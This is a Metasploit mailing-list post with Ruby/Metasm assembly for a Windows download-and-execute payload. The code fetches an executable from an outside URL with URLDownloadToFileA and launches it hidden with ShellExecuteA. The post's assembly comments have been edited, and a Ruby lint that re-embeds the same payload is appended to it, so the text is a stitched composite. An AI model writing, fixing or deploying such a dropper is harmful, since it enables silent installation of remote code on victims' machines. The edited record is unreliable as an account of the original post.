Metasploit mailing list archives

Re: Dynamic creation of payload executables with metasm


From: John B <johnb.electric () gmail com>
Date: Mon, 31 May 2010 15:47:34 -0400

I'll take a look at that. I couldn't find any asm code for the encoder, just
hex arrays, and if you've been reading my posts you'll know I'm having
trouble going from hex array back to asm.
Thanks.

Question #4 (I think):

Just to test out Metasm I tried to create a download-and-execute payload from
scratch using imports, just as a test, and I'm having trouble getting it to
work. Following it in OllyDbg, it calls URLDownloadToFile and creates the file in
the dir, but then either freezes or crashes trying to execute a non-existent
memory address. Here is the code, if anybody is familiar with Metasm and
can point out what I'm doing wrong. The syntax is from their docs and it
throws no error during assembly, but it doesn't get past creating an empty
file.

require 'metasm'

# Build a 32-bit PE: fetch a file with urlmon!URLDownloadToFileA, run it with
# shell32!ShellExecuteA, then leave through kernel32!ExitProcess.
# Both Win32 APIs are stdcall: arguments are pushed right-to-left and the
# callee pops them, so the push count must match the prototype exactly.
pe = Metasm::PE.assemble Metasm::Ia32.new, <<EOS

.entrypoint

; URLDownloadToFileA(pCaller, szURL, szFileName, dwReserved, lpfnCB)
push 0          ; lpfnCB     = NULL
push 0          ; dwReserved = 0
push PATH       ; szFileName
push URL        ; szURL
push 0          ; pCaller    = NULL
call download

; ShellExecuteA(hwnd, lpOperation, lpFile, lpParameters, lpDirectory, nShowCmd)
push 0          ; nShowCmd     = 0 (SW_HIDE)
push 0          ; lpDirectory  = NULL
push 0          ; lpParameters = NULL
push PATH       ; lpFile
push CMD        ; lpOperation  = "open"
push 0          ; hwnd         = NULL
call execute

; Terminate via ExitProcess rather than returning from the entry point
; (this replaces the bare ret of the original post).
push 0          ; uExitCode
call exitproc

; .import '<dll>' <export> <label>: the label is the thunk the code calls.
.import 'shell32' ShellExecuteA execute
.import 'urlmon' URLDownloadToFileA download
.import 'kernel32' ExitProcess exitproc

.data

; LPCSTR arguments must be NUL-terminated: keep the trailing ", 0" on each.
URL db "http://imperiumsec.com/download/hellow.exe", 0
PATH db "c:/users/john/testd.exe", 0
CMD db "open", 0

EOS

pe.encode_file 'down.exe'
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
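An added check, written for this archive and not part of the original post or of Metasm: a small Ruby lint for hand-written Ia32/Metasm PE sources of the shape posted above. It flags the two stdcall mistakes that typically end in a jump to a bogus address, a push count that does not match the callee's prototype (the callee pops a fixed amount, so esp is wrong after the call) and an LPCSTR string in `.data` whose `, 0` terminator is missing (for example because a stray `;` turned it into a comment). The argument counts come from the Win32 prototypes of URLDownloadToFileA, ShellExecuteA and ExitProcess; the `exitproc` thunk label and the `.import 'kernel32' ExitProcess` line are assumptions of this example, and the sample sources are constructed inline.

```ruby
# Added example (not from the post, not Metasm code): lint a hand-written
# Metasm/Ia32 PE source for stdcall push-count mismatches and for db strings
# that are not NUL-terminated. Understands only the syntax subset used in
# the post: .import, push/call, and "<label> db ...".

# Argument counts of the stdcall APIs used (from the Win32 prototypes).
STDCALL_ARGC = {
  'URLDownloadToFileA' => 5, # pCaller, szURL, szFileName, dwReserved, lpfnCB
  'ShellExecuteA'      => 6, # hwnd, lpOperation, lpFile, lpParameters, lpDirectory, nShowCmd
  'ExitProcess'        => 1, # uExitCode
}.freeze

# Drop a ';' comment, ignoring ';' characters inside double-quoted strings.
def strip_comment(line)
  out = String.new
  in_string = false
  line.each_char do |c|
    in_string = !in_string if c == '"'
    break if c == ';' && !in_string
    out << c
  end
  out.strip
end

# Collect thunk aliases (.import), data strings (db) and push/call groups.
def parse_source(src)
  aliases = {}   # thunk label => API name
  strings = {}   # data label  => true when the db operand list ends in ", 0"
  calls   = []   # [thunk label, number of pushes immediately before the call]
  pending = 0
  src.each_line do |raw|
    line = strip_comment(raw)
    next if line.empty?
    case line
    when /\A\.import\s+'[^']+'\s+(\w+)(?:\s+(\w+))?\z/
      api, label = $1, $2
      aliases[label || api] = api
    when /\A(\w+)\s+db\s+(.*)\z/
      label, ops = $1, $2
      strings[label] = ops.match?(/,\s*0\z/)
    when /\Apush\b/
      pending += 1
    when /\Acall\s+(\w+)\z/
      calls << [$1, pending]
      pending = 0
    else
      pending = 0 # any other line (label, directive, ret) breaks the push run
    end
  end
  [aliases, strings, calls]
end

# Returns a list of human-readable problems; empty means the source passed.
def check_source(src)
  aliases, strings, calls = parse_source(src)
  problems = []
  calls.each do |label, npush|
    api = aliases[label]
    if api.nil?
      problems << "call #{label}: no .import defines this thunk label"
    elsif (want = STDCALL_ARGC[api]) && want != npush
      problems << "call #{label} (#{api}): #{npush} pushes, prototype takes #{want}"
    end
  end
  strings.each do |label, terminated|
    problems << "#{label}: db string is not NUL-terminated" unless terminated
  end
  problems
end

# Constructed input: the post's program with ExitProcess added (assumed label
# exitproc) and every string terminated.
GOOD_SRC = <<~ASM
  .entrypoint
  push 0
  push 0
  push PATH
  push URL
  push 0
  call download
  push 0
  push 0
  push 0
  push PATH
  push CMD
  push 0
  call execute
  push 0
  call exitproc
  .import 'shell32' ShellExecuteA execute
  .import 'urlmon' URLDownloadToFileA download
  .import 'kernel32' ExitProcess exitproc
  .data
  URL db "http://imperiumsec.com/download/hellow.exe", 0
  PATH db "c:/users/john/testd.exe", 0
  CMD db "open", 0
ASM

# Constructed broken variant: one push too many before ShellExecuteA, and a
# stray ';' that turns the URL's ", 0" terminator into a comment.
BAD_SRC = GOOD_SRC.sub("push CMD\n", "push CMD\npush 0\n")
                  .sub('hellow.exe", 0', 'hellow.exe";, 0')

if __FILE__ == $0
  puts "good: #{check_source(GOOD_SRC).inspect}"
  puts "bad:  #{check_source(BAD_SRC).inspect}"
end
```

Run it on the source before assembling; a clean result does not prove the binary works (it says nothing about section flags or how Metasm lays out the thunks), but a non-empty one points at a stack or string bug that the assembler will never report.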